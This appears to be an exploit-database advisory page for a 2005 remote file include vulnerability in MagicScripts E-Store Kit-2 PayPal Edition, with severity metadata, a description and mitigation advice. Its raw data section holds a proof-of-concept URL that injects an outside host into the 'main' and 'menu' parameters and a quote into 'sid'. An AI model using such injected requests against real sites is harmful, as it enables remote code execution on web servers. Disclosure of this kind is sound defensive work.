header-logo
Suggest Exploit
vendor:
MagicScripts E-Store Kit-2 PayPal Edition
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: MagicScripts E-Store Kit-2 PayPal Edition
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: a:magicscripts:magicscripts_e-store_kit-2_paypal_edition
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

MagicScripts E-Store Kit-2 PayPal Edition Remote File Include Vulnerability

MagicScripts E-Store Kit-2 PayPal Edition is prone to a remote file include vulnerability. Remote attackers could potentially exploit this issue to include a remote malicious PHP script. If the attacker is able to execute the remote script it would execute in the context of the Web server hosting the vulnerable application.

Mitigation:

Input validation should be used to prevent attackers from including malicious files. Additionally, the application should be configured to only allow the inclusion of files from trusted sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12910/info

MagicScripts E-Store Kit-2 PayPal Edition is prone to a remote file include vulnerability.

Remote attackers could potentially exploit this issue to include a remote malicious PHP script. If the attacker is able to execute the remote script it would execute in the context of the Web server hosting the vulnerable application. 

http://www.magicscripts.com/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=http://whatismyip.com&menu=http://whatismyip.com

Navigation

Suggest Exploit

Services By CQR